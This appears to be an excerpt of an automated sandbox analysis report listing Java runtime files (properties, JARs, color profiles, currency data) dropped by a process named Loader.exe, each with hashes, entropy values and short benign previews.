                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):1438
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.214662998532387
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:24:QVDpdQYHLOVhl86bePCkHUMCLC9TFcgg+DR+Oby:MQ4LOVh2WGfUMCLC9Zcgg2Ru
                                                                                                                                                                                                                                                                                                              MD5:92BA2D87915E6F7F58D43344DF07E1A6
                                                                                                                                                                                                                                                                                                              SHA1:872BC54E53377AAC7C7616196BCCE1DB6A3F0477
                                                                                                                                                                                                                                                                                                              SHA-256:68F0CF30429A42A6FE78B1DE91970E5C78FD03D1599BEB080C1C196D5C59E4C0
                                                                                                                                                                                                                                                                                                              SHA-512:A964E2CEB4D601FAF28ECF13FB11777B70708C21CF9EA23721E462B6E911051108B8A42EBF6447FA49CB61D7FA2D79475F50EE791F1121616371E2B02FAB71B6
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:# Copyright (c) 2005, 2013, Oracle and/or its affiliates. All rights reserved...# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms...#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#....#..# Japanese imperial calendar..#..# Meiji since 1868-01-01 00:00:00 local time (Gregorian)..# Taisho since 1912-07-30 00:00:00 local time (Gregorian)..# Showa since 1926-12-25 00:00:00 local time (Gregorian)..# Heisei since 1989-01-08 00:00:00 local time (Gregorian)..calendar.japanese.type: LocalGregorianCalendar..calendar.japanese.eras: \...name=Meiji,abbr=M,since=-3218832000000; \...name=Taisho,abbr=T,since=-1812153600000; \...name=Showa,abbr=S,since=-1357603200000; \...name=Heisei,abbr=H,since=600220800000....#..# Taiwanese calendar..# Minguo since 1911-01-01 00:00:00 local time (Gregorian)..calendar.taiwanese.type: LocalGregorianCalendar..calendar.taiwanese.eras: \...name=MinGuo,since=-1830384000000....#..# Thai Buddhist calendar..# Buddhist Era since -5

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\charsets.jar

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Java archive data (JAR)
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):3091908
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.633254981822853
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:49152:puZi4j4TQkgaSOHEhjy2twRYEc1sJzlbguMuD:puZiW4smxGocuJlbgq
                                                                                                                                                                                                                                                                                                              MD5:0B3923ABB0D48FDAE7A2306717967B39
                                                                                                                                                                                                                                                                                                              SHA1:0882294FFEC2769023AA36FF9CC53562F8E26020
                                                                                                                                                                                                                                                                                                              SHA-256:E88AEC2A49F07CAC9471D9E4C113FA189600B57245685814D043C20EA8A8B471
                                                                                                                                                                                                                                                                                                              SHA-512:CF622081B290140CE8419B30FB25442F7204C9A37E1490030A4D656F66C509946F48C50CC7794DA51007EFB202805605FE3C2AC3534D63FBF928EA35CE16A040
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:PK........s..H................META-INF/....PK........s..H<:S1D...D.......META-INF/MANIFEST.MFManifest-Version: 1.0..Created-By: 1.7.0_07 (Oracle Corporation)....PK...........HUi..............sun/nio/cs/ext/Big5.class.......4."..........t....t............................................................................................................................................................................................................................................................................................................................................................................~.........b2cSBStr...Ljava/lang/String;...ConstantValue...b2cStr...[Ljava/lang/String;...b2c...[[C...b2cSB...[C...b2cInitialized...Z...c2b...c2bIndex...c2bInitialized...<init>...()V...Code...LineNumberTable...historicalName...()Ljava/lang/String;...contains...(Ljava/nio/charset/Charset;)Z...StackMapTable...newDecoder..#()Ljava/nio/charset/CharsetDecoder;...newEncoder..#()Ljava/nio/charset/Ch

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\classlist

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):84355
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.927199323446014
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:1536:4X/nxfn5rxLyMznYolTzlff5OK3COHoHNG5rb/cxNwmCX1g86K2oWdAqNqc+KMjD:qxn5rxLyMzbf5OK3CJNG51g86A
                                                                                                                                                                                                                                                                                                              MD5:7FC71A62D85CCF12996680A4080AA44E
                                                                                                                                                                                                                                                                                                              SHA1:199DCCAA94E9129A3649A09F8667B552803E1D0E
                                                                                                                                                                                                                                                                                                              SHA-256:01FE24232D0DBEFE339F88C44A3FD3D99FF0E17AE03926CCF90B835332F5F89C
                                                                                                                                                                                                                                                                                                              SHA-512:B0B9B486223CF79CCF9346AAF5C1CA0F9588247A00C826AA9F3D366B7E2EF905AF4D179787DCB02B32870500FD63899538CF6FAFCDD9B573799B255F658CEB1D
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:java/lang/Object..java/lang/String..java/io/Serializable..java/lang/Comparable..java/lang/CharSequence..java/lang/Class..java/lang/reflect/GenericDeclaration..java/lang/reflect/AnnotatedElement..java/lang/reflect/Type..java/lang/Cloneable..java/lang/ClassLoader..java/lang/System..java/lang/Throwable..java/lang/Error..java/lang/ThreadDeath..java/lang/Exception..java/lang/RuntimeException..java/lang/SecurityManager..java/security/ProtectionDomain..java/security/AccessControlContext..java/security/SecureClassLoader..java/lang/ClassNotFoundException..java/lang/ReflectiveOperationException..java/lang/NoClassDefFoundError..java/lang/LinkageError..java/lang/ClassCastException..java/lang/ArrayStoreException..java/lang/VirtualMachineError..java/lang/OutOfMemoryError..java/lang/StackOverflowError..java/lang/IllegalMonitorStateException..java/lang/ref/Reference..java/lang/ref/SoftReference..java/lang/ref/WeakReference..java/lang/ref/FinalReference..java/lang/ref/PhantomReference..sun/misc/Cleaner

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\cmm\CIEXYZ.pf

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Sun KCMS color profile 2.0, type KCMS, XYZ/XYZ-spac device, 51236 bytes, 2-12-1997 18:50:04, dependently, PCS X=0xf6b3 Z=0xd2f8 "XYZ to XYZ Identity Profile"
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):51236
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.226972359973779
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:1536:2Qnt0y7xFNksbeCqY39JJ8GmaNo68GmaNo68GmaNoW:JOy7xXjtqYNfHxNo6HxNo6HxNoW
                                                                                                                                                                                                                                                                                                              MD5:10F23396E21454E6BDFB0DB2D124DB85
                                                                                                                                                                                                                                                                                                              SHA1:B7779924C70554647B87C2A86159CA7781E929F8
                                                                                                                                                                                                                                                                                                              SHA-256:207D748A76C10E5FA10EC7D0494E31AB72F2BACAB591371F2E9653961321FE9C
                                                                                                                                                                                                                                                                                                              SHA-512:F5C5F9FC3C4A940D684297493902FD46F6AA5248D2B74914CA5A688F0BAD682831F6060E2264326D2ECB1F3544831EB1FA029499D1500EA4BFE3B97567FE8444
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:...$KCMS....spacXYZ XYZ .........2..acspSUNW....KODA.ODA............................................................................A2B0.......4B2A0.......4cprt.......Gwtpt...T....desc...h....K070........K071........mft2................................................................................................................ !!""##$$%%&&''(())**++,,--..//00112233445566778899::;;<<==>>??@@AABBCCDDEEFFGGHHIIJJKKLLMMNNOOPPQQRRSSTTUUVVWWXXYYZZ[[\\]]^^__``aabbccddeeffgghhiijjkkllmmnnooppqqrrssttuuvvwwxxyyzz{{||}}~~.................................................................................................................................................................................................................................................................................................................................. !!""##$$%%&&''(())**++,,--..//00112233445566778899::;;<<==>>??@@AABBCCDDEEFFGGHHIIJJKKLLMMNNOOPPQQRRSSTTUUVVWWXXYYZZ[[\\]]^^__``aabbccddeeffgghhiijjkkllmm

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\cmm\GRAY.pf

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Sun KCMS color profile 2.0, type KCMS, GRAY/XYZ-mntr device, KODA/GRAY model, 632 bytes, 27-7-95 17:30:15, embedded, relative colorimetric, PCS Z=0xd32b "KODAK Grayscale Conversion - Gamma 1.0"
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):632
                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.7843698642539243
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:12:51AP3fJgXQ531yqQac/lkgz42WlHlYujlOl9Fhl:vA2XQCqpUlkgzulHiXl3hl
                                                                                                                                                                                                                                                                                                              MD5:1002F18FC4916F83E0FC7E33DCC1FA09
                                                                                                                                                                                                                                                                                                              SHA1:27F93961D66B8230D0CDB8B166BC8B4153D5BC2D
                                                                                                                                                                                                                                                                                                              SHA-256:081CAAC386D968ADD4C2D722776E259380DCF78A306E14CC790B040AB876D424
                                                                                                                                                                                                                                                                                                              SHA-512:334D932D395B46DFC619576B391F2ADC2617E345AFF032B592C25E333E853735DA8B286EF7542EB19059CDE8215CDCEA147A3419ED56BDD6006CA9918D0618E1
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:...xKCMS....mntrGRAYXYZ ._..........acspSUNW....KODAGRAY.......................+....................................................cprt.......?desc........dmnd.......`wtpt........kTRC........dmdd.......dtext....COPYRIGHT (c) 1997 Eastman Kodak, All rights reserved...desc.......'KODAK Grayscale Conversion - Gamma 1.0..................@...............~.......................~.......~..............desc........KODAK..................@..................................................,...,....XYZ ...............+curv............desc........Grayscale..................@..................................................,...,....

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\cmm\LINEAR_RGB.pf

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:color profile 2.0, type KCMS, RGB/XYZ-mntr device by KODK, 1044 bytes, 2-2-1998, PCS Z=0xd32c "linear sRGB"
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):1044
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.510788634170065
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:6:zwuau/7De0/q98EAsBIMD/WvaKIV4R0/lCAEdD0WlV9AEdwKKt/n3knR3lfR/NHD:zw7ePB/rEAsBIkVuUlAYKu/nUnKw
                                                                                                                                                                                                                                                                                                              MD5:A387B65159C9887265BABDEF9CA8DAE5
                                                                                                                                                                                                                                                                                                              SHA1:7913274C2F73BAFCF888F09FF60990B100214EDE
                                                                                                                                                                                                                                                                                                              SHA-256:712036AA1951427D42E3E190E714F420CA8C2DD97EF01FCD0675EE54B920DB46
                                                                                                                                                                                                                                                                                                              SHA-512:359D9B57215855F6794E47026C06036B93710998205D0817C6E602B2A24DAEB92537C388F129407461FC60180198F02A236AEB349A17430ED7AC85A1E5F71350
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:....KCMS....mntrRGB XYZ ............acsp........KODK...........................,KODK................................................cprt.......Hdesc...8....rXYZ........gXYZ........bXYZ........rTRC........gTRC........bTRC........wtpt........text....Copyright (c) Eastman Kodak Company, 1998, all rights reserved..desc........linear sRGB............l.i.n.e.a.r. .s.R.G.B.....linear sRGB........................................................XYZ ......m...6.....XYZ ......e........!XYZ ......#B...^...Kcurv........................................................................ !!""##$$%%&&''(())**++,,--..//00112233445566778899::;;<<==>>??@@AABBCCDDEEFFGGHHIIJJKKLLMMNNOOPPQQRRSSTTUUVVWWXXYYZZ[[\\]]^^__``aabbccddeeffgghhiijjkkllmmnnooppqqrrssttuuvvwwxxyyzz{{||}}~~..........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\cmm\PYCC.pf

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Sun KCMS color profile 2.0, type KCMS, 3CLR/Lab-spac device, 274474 bytes, 6-11-1996 7:50:04, PCS X=0xf6b3 Z=0xd2f8 "Std Photo YCC Print"
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):274474
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.843290819622709
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:6144:nJleRNRyAnAqNaADEJHeeeeevoAuaiqwV6sg0pUjRVgYgI:nJleRNRpN0j3qhjRC9I
                                                                                                                                                                                                                                                                                                              MD5:24B9DEE2469F9CC8EC39D5BDB3901500
                                                                                                                                                                                                                                                                                                              SHA1:4F7EED05B8F0EEA7BCDC8F8F7AAEB1925CE7B144
                                                                                                                                                                                                                                                                                                              SHA-256:48122294B5C08C69B7FE1DB28904969DCB6EDC9AA5076E3F8768BF48B76204D0
                                                                                                                                                                                                                                                                                                              SHA-512:D23CE2623DE400216D249602486F21F66398B75196E80E447143D058A07438919A78AE0ED2DDF8E80D20BD70A635D51C9FB300E9F08A4751E00CD21883B88693
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:..0*KCMS....spac3CLRLab .........2..acspSUNW....KODAnone............................................................................A2B0... ...4B2A0...T..f4cprt..-....Gdmnd..-....ndmdd...@...zwtpt........desc.......nK013../@....K019../L....K030../.....K031..0.....K070..0.....K071..0 ....mft2.....................................................K.S.8.....l.....0...3.........U.. .!h".$.%\&.'.)5*y+.,..5/o0.1.3.4E5v6.7.8.:*;S<z=.>.?.A.B,CLDkE.F.G.H.I.K.L!M7NLO`PsQ.R.S.T.U.V.W.X.Y.[.\.].^._%`,a2b8c=dAeEfHgJhLiMjMkMlLmKnIoFpCq@r;s7t1u,v%w.x.y.z.z.{.|.}.~...............p.b.S.C.3.#..............~.j.U.@.+.............t.\.C.*...........r.W.;...........p.R.3..........w.V.6.........l.J.'........v.R.-.......t.N.(.......f.?........v.N.%........U.+.......U.*......z.N."......n.@.......Z.+......o.@.........P. .......\.+.......d.1...........................z.p.f.[.Q.G.=.3.). ........................ .!.".#.$.%.&{'s(k)d*]+U,N-G.@/9021,2%3.4.5.6.7.8.8.9.:.;.<.=.>.?.@.A.B.C.D.E.F.

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\cmm\sRGB.pf

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Microsoft color profile 2.1, type Lino, RGB/XYZ-mntr device, IEC/sRGB model by HP, 3144 bytes, 9-2-1998 6:49:00 "sRGB IEC61966-2.1"
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):3144
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.026867070945169
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:48:+FflsXlf/lulel4wlwx+6MjnNsvIYWiR5QkyTJbZPHXZ9u6gbVwyKzJgWjU:aN26MT0D5MdtbZPAVwzV0
                                                                                                                                                                                                                                                                                                              MD5:1D3FDA2EDB4A89AB60A23C5F7C7D81DD
                                                                                                                                                                                                                                                                                                              SHA1:9EAEA0911D89D63E39E95F2E2116EAEC7E0BB91E
                                                                                                                                                                                                                                                                                                              SHA-256:2B3AA1645779A9E634744FAF9B01E9102B0C9B88FD6DECED7934DF86B949AF7E
                                                                                                                                                                                                                                                                                                              SHA-512:16AAE81ACF757036634B40FB8B638D3EBA89A0906C7F95BD915BC3579E3BE38C7549EE4CD3F344EF0A17834FF041F875B9370230042D20B377C562952C47509B
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:...HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................view.........._.....

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\content-types.properties

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):5824
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.074440246603207
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:96:6M5VfH+uEMmPDkZeujdJfZUB8BB/+PhPXsOQ71GAXf5lZuU1EbWF7Ycx/AQ12a8T:6M6p4ZeWd1ZUB8BBGPhPXsOQ71GAXBly
                                                                                                                                                                                                                                                                                                              MD5:95AE170D90764B3F5E68C72E8C518DDC
                                                                                                                                                                                                                                                                                                              SHA1:1939B699D16A5DB3E3F905466222099D7C29285A
                                                                                                                                                                                                                                                                                                              SHA-256:A2B31E9CBCEAB296A5E1CF056EFD953CED23B888CD929B0BBE6EB6B53D2BF861
                                                                                                                                                                                                                                                                                                              SHA-512:87E970BEAC8141C757D622FC8B6D84FE173EA4B134AFD8E2F979714C1110C3D92F3CE5F2B9DC74804DD37D13AB2A0EDF0FCA242F61CF8ED065AE81B7331F8816
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:#sun.net.www MIME content-types table..#..# Property fields:..#..# <description> ::= 'description' '=' <descriptive string>..# <extensions> ::= 'file_extensions' '=' <comma-delimited list, include '.'>..# <image> ::= 'icon' '=' <filename of icon image>..# <action> ::= 'browser' | 'application' | 'save' | 'unknown'..# <application> ::= 'application' '=' <command line template>..#....#..# The "we don't know anything about this data" type(s)...# Used internally to mark unrecognized types...#..content/unknown: description=Unknown Content..unknown/unknown: description=Unknown Data Type....#..# The template we should use for temporary files when launching an application..# to view a document of given type...#..temp.file.template: c:\\temp\\%s....#..# The "real" types...#..application/octet-stream: \...description=Generic Binary Stream;\...file_extensions=.saveme,.dump,.hqx,.arc,.obj,.lib,.bin,.exe,.zip,.gz....application/oda: \...description=ODA Document;\...file_extens

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\currency.data

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):4122
                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.2585384283455134
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:48:BlWxFFGFSupi94blATFxjGph5vLC6/w37ZXQTbVm/eVzOBJ:BlWJEi94blAT+ph5vLkApmGqr
                                                                                                                                                                                                                                                                                                              MD5:F6258230B51220609A60AA6BA70D68F3
                                                                                                                                                                                                                                                                                                              SHA1:B5B95DD1DDCD3A433DB14976E3B7F92664043536
                                                                                                                                                                                                                                                                                                              SHA-256:22458853DA2415F7775652A7F57BB6665F83A9AE9FB8BD3CF05E29AAC24C8441
                                                                                                                                                                                                                                                                                                              SHA-512:B2DFCFDEBF9596F2BB05F021A24335F1EB2A094DCA02B2D7DD1B7C871D5EECDA7D50DA7943B9F85EDB5E92D9BE6B6ADFD24673CE816DF3960E4D68C7F894563F
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:CurD..........................@C..,M...................... K...C..PF..4@...........R...........C......TF...........M..DL...C.......S..........<M...c...................C...C...A..........hK...C...M.......... O......8...PC...C..........@E...............E..............`.......pX...O...........B...C.......O...D..............,J..........................................@J..............XO..........................................0C...........................O...........................................M.......A...............................................................C...O...................................................................O..........TK...........R...O..............8C...........................P.................. C..............................................`C..........PK...............J......0F..pE...................................Q...............................R.......Q...........c...Q...................................................................................C

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\deploy.jar

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Java archive data (JAR)
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):2282861
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.951223313727943
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:49152:ABSxAmHHJwEu4l3Dyz7oQHeNHJJ2aAvfZc:ABEtHHaEuI3Dy3oQH2pFAvW
                                                                                                                                                                                                                                                                                                              MD5:2388C4C8D5F95E0379A8997C7C2492F4
                                                                                                                                                                                                                                                                                                              SHA1:906BF87EB1D8881ABADBF93A3C4BBA7887CA2A01
                                                                                                                                                                                                                                                                                                              SHA-256:A1FD508EACF76645EB0885B243B5DD14239F1E039E8B53ED038226DF91A30539
                                                                                                                                                                                                                                                                                                              SHA-512:2CCE11A5F97DF842964B55408FCF1EC84C0CD561E664ABA3A51275EAFE59D7C920FCFD954C527DA4D53ACB191200CC64BF8150A33BCB9B038F36ADB2CC69B1A1
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:PK...........H................META-INF/....PK...........H...7Z...e.......META-INF/MANIFEST.MF.M..LK-...K-*...R0.3..r.C.q,HL.HU...%...y...R.KRSt.*...L....u....4....sR......K..5y.x..PK...........H................com/PK...........H................com/oracle/PK...........H................com/oracle/deploy/PK...........H................com/oracle/deploy/update/PK...........H................com/sun/PK...........H................com/sun/applet2/PK...........H................com/sun/applet2/preloader/PK...........H............ ...com/sun/applet2/preloader/event/PK...........H................com/sun/deploy/PK...........H................com/sun/deploy/appcontext/PK...........H................com/sun/deploy/association/PK...........H............#...com/sun/deploy/association/utility/PK...........H................com/sun/deploy/cache/PK...........H................com/sun/deploy/config/PK...........H................com/sun/deploy/jardiff/PK...........H................com/sun/deploy/model/PK.....

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\deploy\ffjcext.zip

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):14156
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.649187440261259
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:48:E84SHTDIbZI+R9ufdITe3MPu20DguN9P5YOinvYrJJ0JKP/U8HtK8NJO8lJi8VJb:kld6uQZ9P5dTC7IjZUkPmpaemFqKs8n
                                                                                                                                                                                                                                                                                                              MD5:91052ADB799AEF68EA76931997C40CE4
                                                                                                                                                                                                                                                                                                              SHA1:19255B8E335C22A171C26148099191708C99EE7A
                                                                                                                                                                                                                                                                                                              SHA-256:61D1382375238F90E2E4EE2AF985D978F1409E01B38080E710DF4ACB2897E63B
                                                                                                                                                                                                                                                                                                              SHA-512:39BAA49A1CEF533E5D3FFF1A86BC72CB346A6BF1928A9D8B505EBA09A4AB1506400234DE78BDFD925821F0A690B8887BD004A18CC64337DEB666CC2509DEE5DA
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:PK........$..H............'...{CAFEEFAC-0018-0000-0101-ABCDEFFEDCBA}/UT....GjW.GjWux.............PK........#..H................{CAFEEFAC-0018-0000-0101-ABCDEFFEDCBA}/chrome/UT....GjW.GjWux.............PK........#..H............6...{CAFEEFAC-0018-0000-0101-ABCDEFFEDCBA}/chrome/content/UT....GjW.GjWux.............PK........#..H............>...{CAFEEFAC-0018-0000-0101-ABCDEFFEDCBA}/chrome/content/ffjcext/UT....GjW.GjWux.............PK........#..H...V........H...{CAFEEFAC-0018-0000-0101-ABCDEFFEDCBA}/chrome/content/ffjcext/ffjcext.jsUT....GjW.GjWux.............const gJavaConsole1_8_0_101 = {...id.: "javaconsole1.8.0_101",...mimeType: "application/x-java-applet;jpi-version=1.8.0_101",...install.: function() {...window.addEventListener("load",this.init,false);..},...init.: function() { ...if (navigator.mimeTypes[gJavaConsole1_8_0_101.mimeType]) {....var toolsPopup = document.getElementById("menu_ToolsPopup");.....toolsPopup.addEventListener("popupshowing",gJavaConsole1_8_0_101.enable,false)

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\deploy\messages.properties

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):2917
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.838706790124659
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:48:KaDMJ9TmsHDmDDCDP2un8YzgKe1E13Tstub22tTeF/Qi/WRtAXikTzgaENZzT3JI:KaD+9TmAe29vBotubbt2Oz+ENlbJI
                                                                                                                                                                                                                                                                                                              MD5:2EB9117D147BAA0578E4000DA9B29E12
                                                                                                                                                                                                                                                                                                              SHA1:3D297ECF3D280D4AA3D1423E885994495243F326
                                                                                                                                                                                                                                                                                                              SHA-256:B8D9C69FF7F4832A9B365D4A43CF66DFF9847051752B13EEDF024CAA9C1EF46B
                                                                                                                                                                                                                                                                                                              SHA-512:C3F7730767941B3C8F6F53D4686E9F898D1907D978F6D1FA35BA02C3FCD8306335406A5F9ABAA844F27F7AFD9E548810BECB9EC3E6B84888EA5EAC57B6ED6FDB
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:#..# Copyright (c) 2004, 2011, Oracle and/or its affiliates. All rights reserved...# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms...#....error.internal.badmsg=internal error, unknown message..error.badinst.nojre=Bad installation. No JRE found in configuration file..error.launch.execv=Error encountered while invoking Java Web Start (execv)..error.launch.sysexec=Error encountered while invoking Java Web Start (SysExec) ..error.listener.failed=Splash: sysCreateListenerSocket failed..error.accept.failed=Splash: accept failed..error.recv.failed=Splash: recv failed..error.invalid.port=Splash: didn't revive a valid port..error.read=Read past end of buffer..error.xmlparsing=XML Parsing error: wrong kind of token found..error.splash.exit=Java Web Start splash screen process exiting .....\n..# "Last WinSock Error" means the error message for the last operation that failed...error.winsock=\tLast WinSock Error: ..error.winsock.load=Couldn't load winsock.dll..error.winsock.start

                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\lib\deploy\messages_de.properties

                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1345), with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):3338
